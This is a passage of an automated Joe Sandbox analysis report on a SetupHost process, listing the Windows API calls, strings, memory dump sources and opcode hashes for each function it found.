                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memmove_smemset
                                                                                                                                                                                                                • String ID: @$o
                                                                                                                                                                                                                • API String ID: 3558296885-2738801085
                                                                                                                                                                                                                • Opcode ID: fd10dde5a9742b2d77234d2103187d73e2035d655ef67af4fedd5ccf27ad011b
                                                                                                                                                                                                                • Instruction ID: 615ccd2724fdd87ea33688a8dde5ea16a6512e28a74c43fc7870032657c29705
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd10dde5a9742b2d77234d2103187d73e2035d655ef67af4fedd5ccf27ad011b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9A27BB1A083458FC714CF18C490A6AF7E2FFC8314F184A6DE99A9B355D770E846CB96
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C1A87
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C1AA4
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C1B26
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,7C8B7478,80070057,80070057,?), ref: 009C1B32
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009C1B39
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Free$Process
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2719409998-0
                                                                                                                                                                                                                • Opcode ID: 123d9254f4d8f8b6d005337dfeb41f8ee5c29bede9fd22a223176115df12b605
                                                                                                                                                                                                                • Instruction ID: 5e20ec4d10c2a7c5c6bb5581aee09427b8dcb03f1a95ffbd953cca521ad4938b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 123d9254f4d8f8b6d005337dfeb41f8ee5c29bede9fd22a223176115df12b605
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08719032E015199FCB15CF98C850FAEB7BAAF8A710F15816CE805BB251D730ED01CBA9
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __allrem.LIBCMT ref: 009EC17A
                                                                                                                                                                                                                • SetLastError.KERNEL32(000004D3,?,?,?,?,009DE358,00A00000,00000000,00000000,?,00000001), ref: 009EC1A1
                                                                                                                                                                                                                • BCryptHashData.BCRYPT(?,009E3894,?,00000000,?,00000000,00000000,00000000,?,00000001), ref: 009EC206
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000001), ref: 009EC217
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,?,00000001), ref: 009EC246
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$CryptDataHash__allrem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4038014144-0
                                                                                                                                                                                                                • Opcode ID: 61cfc6385424659155e472a8a59c40629981842463218cef4ac680c2950fbc87
                                                                                                                                                                                                                • Instruction ID: 67a748000d193460107affa57561978c3851607a998e39028b98531ec9223b92
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61cfc6385424659155e472a8a59c40629981842463218cef4ac680c2950fbc87
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42414EB1E0024AABDF15DFD9C881BAEB7B9BF88710F208129E954A7344D770DD02CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000010,?,?,00000000,?,?,?,?,009C166A,00000000,?,00000014,00000000,00000000), ref: 009C1487
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,?,?,?,009C166A,00000000,?,00000014,00000000,00000000,?,WIM\IMAGE[*]), ref: 009C148E
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C152C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,009C166A,00000000,?,00000014,00000000,00000000), ref: 009C1539
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 009C1540
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$Alloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2768201423-0
                                                                                                                                                                                                                • Opcode ID: d0d4a47ed3cd14439f170eb14dd3889e99b2db31a09ee49d182f4ec0c55521e4
                                                                                                                                                                                                                • Instruction ID: c561d045c0e6532e03ff9ed68af542dbd55d72d7462f4e3e7aa4a3fd5af8e74b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0d4a47ed3cd14439f170eb14dd3889e99b2db31a09ee49d182f4ec0c55521e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E314F76E00659AFCB01DF98C880F9EB7B9EF89750F258069F905EB311D631DE018BA5
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00000001), ref: 009E11F3
                                                                                                                                                                                                                • NtQueryInformationFile.NTDLL ref: 009E1240
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E1259
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009E1260
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,?), ref: 009E128A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$ErrorInformation$HandleLastQueryStatusWrite
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 133596512-0
                                                                                                                                                                                                                • Opcode ID: 50b70361245d49b75c0756043f0c4d665cca539a94dba8bae2ae312bc7895ab2
                                                                                                                                                                                                                • Instruction ID: 006c247c65a5bfb8f64c0d2e87e9eb88bfe11a1a3c7e01ecbf4dc17d2aae5c1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50b70361245d49b75c0756043f0c4d665cca539a94dba8bae2ae312bc7895ab2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB21B576A04259ABCB1ACFA5DC54AAEBBBDFF48710F04452DFA12E7240DA30DC41CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,009C07A0,?), ref: 009C1209
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,009C07A0,?,?,00000000,00000000,00000000), ref: 009C1210
                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 009C1249
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009C1253
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 009C1278
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastOpenPrivileges
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2672816888-0
                                                                                                                                                                                                                • Opcode ID: 79fb6b4d3e6975c3afd334406b3b3351b7feb4090715010851baa8d5ffe01cbe
                                                                                                                                                                                                                • Instruction ID: 4d01c956dee6787d0f9199bece026a52d86b500785b1920ee3d8194c138d9488
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79fb6b4d3e6975c3afd334406b3b3351b7feb4090715010851baa8d5ffe01cbe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89214A76E00209EBCB00CFE8DC45AEEBBBCFB09754F108129E511E7250D7309946CBA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 009C4248
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C428C
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C42A9
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C444E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeap$_wcsicmp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3839862788-0
                                                                                                                                                                                                                • Opcode ID: aedfa743c57f529d6ca86477ff91a9206fad6410c84373200ae5aceef1a6e260
                                                                                                                                                                                                                • Instruction ID: 34856098946c797ecd6bf621a7fafc04d51ecbac1b0e333152195fa1861741c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aedfa743c57f529d6ca86477ff91a9206fad6410c84373200ae5aceef1a6e260
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24913771F006099FDF05DFE9D9A1FAEBBB9AF48314F60402CE911AB261DA70A905CB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,?), ref: 009DBA8B
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: DbgPrintEx.NTDLL ref: 009DB3F2
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 009DB400
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • RtlAllocateLBlob, xrefs: 009DBAA8
                                                                                                                                                                                                                • onecore\base\lstring\lblob.cpp, xrefs: 009DBA9D
                                                                                                                                                                                                                • Blob->Buffer = (PUCHAR)((*RtlAllocateStringRoutine)(Bytes)), xrefs: 009DBAB6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeapPrintRaiseStatus
                                                                                                                                                                                                                • String ID: Blob->Buffer = (PUCHAR)((*RtlAllocateStringRoutine)(Bytes))$RtlAllocateLBlob$onecore\base\lstring\lblob.cpp
                                                                                                                                                                                                                • API String ID: 3415175580-488014052
                                                                                                                                                                                                                • Opcode ID: 5a5bed7fd854081777290f33d7ae1e59449536394a32cc18cb379d6eebaf6cf4
                                                                                                                                                                                                                • Instruction ID: 0065310ebcea6d318a81f00399492877f77a28cc662db0be1571ada014e684d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5bed7fd854081777290f33d7ae1e59449536394a32cc18cb379d6eebaf6cf4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDF08CB5904705EFCB219F6DCC04A5ABAFCEF84704B15886ED859D3310E770D900CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000), ref: 009DA1C7
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: DbgPrintEx.NTDLL ref: 009DB3F2
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 009DB400
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CXmlCursor::XmlAlloc, xrefs: 009DA1E3
                                                                                                                                                                                                                • *ppvAlloc = RtlAllocateHeap((((PPEB)__readfsdword(((LONG)(LONG_PTR)&(((TEB *)0)->ProcessEnvironmentBlock))))->ProcessHeap), 0, cb), xrefs: 009DA1F1
                                                                                                                                                                                                                • onecore\base\xml\udom_xmlwalker.h, xrefs: 009DA1D8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeapPrintRaiseStatus
                                                                                                                                                                                                                • String ID: *ppvAlloc = RtlAllocateHeap((((PPEB)__readfsdword(((LONG)(LONG_PTR)&(((TEB *)0)->ProcessEnvironmentBlock))))->ProcessHeap), 0, cb)$CXmlCursor::XmlAlloc$onecore\base\xml\udom_xmlwalker.h
                                                                                                                                                                                                                • API String ID: 3415175580-1030456230
                                                                                                                                                                                                                • Opcode ID: 9e74419f8526901acff5ab854ad4bb56d1966fde01b08e0d72036d41ab913c29
                                                                                                                                                                                                                • Instruction ID: e000d7d0105053faedd7c48bd7fb81b65247e2d885bd6834bc4cc09a4f9cb300
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e74419f8526901acff5ab854ad4bb56d1966fde01b08e0d72036d41ab913c29
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ABF027B18403149FCB219F9C8C08B9EBBF8EB91308F018418E810A3300D775D900CB99
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A0EB33
                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00A0EC62), ref: 00A0EB3C
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00A0EC62,00981000), ref: 00A0EB47
                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00A0EC62,00981000), ref: 00A0EB4E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                • Opcode ID: 8d52788fc099bbae8a94b2658fb5526ce1f31af8d21cfc2ad7ce79542ff70bb0
                                                                                                                                                                                                                • Instruction ID: 7ba276f198307f35bdab51c7c8f326517bbef1079313e4d4aff2171b65622d16
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d52788fc099bbae8a94b2658fb5526ce1f31af8d21cfc2ad7ce79542ff70bb0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6D0C932448105ABCB006BE1ED0CACD3E38EB44312F059000F30986420DA7144438B61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                • Opcode ID: cf3a9d30d8577ddb2042b97354afe2a59e1ad00f1a2ab0adc0d6253cb49c450c
                                                                                                                                                                                                                • Instruction ID: a90a978a78eb47225f835f740531eb6ce43daf002565992c0e79a0e4a2dfb655
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf3a9d30d8577ddb2042b97354afe2a59e1ad00f1a2ab0adc0d6253cb49c450c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B02282B2A005098BDB04DF69C9D1AFA77B5FF94308B1880B9DD0ADF206E735E942CB54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009C2459: RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009C2474
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000008,00010000), ref: 009C466F
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C4799
                                                                                                                                                                                                                  • Part of subcall function 009C1BD6: RtlNtStatusToDosError.NTDLL ref: 009C1BD9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Free$AllocErrorStatus
                                                                                                                                                                                                                • String ID: %c%s
                                                                                                                                                                                                                • API String ID: 2402573065-3720742152
                                                                                                                                                                                                                • Opcode ID: 6025ae2330da57b5c159a7ff21507c9e2ef896b5d1c98cd9f7bc0becb39ad46f
                                                                                                                                                                                                                • Instruction ID: 75f73e7cab5a834ce0b8af94a8368c9aef76b9dc7ba47b6cb870d4d0f08b67fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6025ae2330da57b5c159a7ff21507c9e2ef896b5d1c98cd9f7bc0becb39ad46f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00516872A083519FC310DF68C890A5BBBE8FBC9B50F404A2EF99597250EB70D905CB93
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009C4AD3: RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C4B56
                                                                                                                                                                                                                • wcschr.MSVCRT ref: 009C29C7
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 009C2A37
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeap$wcschr
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4169153763-2457274529
                                                                                                                                                                                                                • Opcode ID: 08a28bd8a4bcb76c261ebb5973ec7ab9944723353c8206de68680e6879c15c23
                                                                                                                                                                                                                • Instruction ID: c45870bda66b08d432d98954f568fa1a90da7304ae62497ab2dfa7ee7252f282
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08a28bd8a4bcb76c261ebb5973ec7ab9944723353c8206de68680e6879c15c23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B318E76A086029FCB15DF19D980A6BB7F5EF88750F00881DFD859B381DA30ED05CBA2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                                                                                • Opcode ID: d40c2f33cf374ca57c9539e1d562942038c79c53d1ad56be24130b6c441d2838
                                                                                                                                                                                                                • Instruction ID: 5dd5116579bb35fa944a274a2de9b1f2eeac7207e0c844ada9e3fb3be31bf49c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d40c2f33cf374ca57c9539e1d562942038c79c53d1ad56be24130b6c441d2838
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FC1B170A002198FCB14CF58C4C0AFEBBF5FF88304F2585AAD959AB356E7359985CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • BCryptGetProperty.BCRYPT(00000000,ObjectLength,?,00000004,00000000,00000000,00000000,?,00000000,?,00000001), ref: 009DC493
                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000000,?), ref: 009DC4AA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
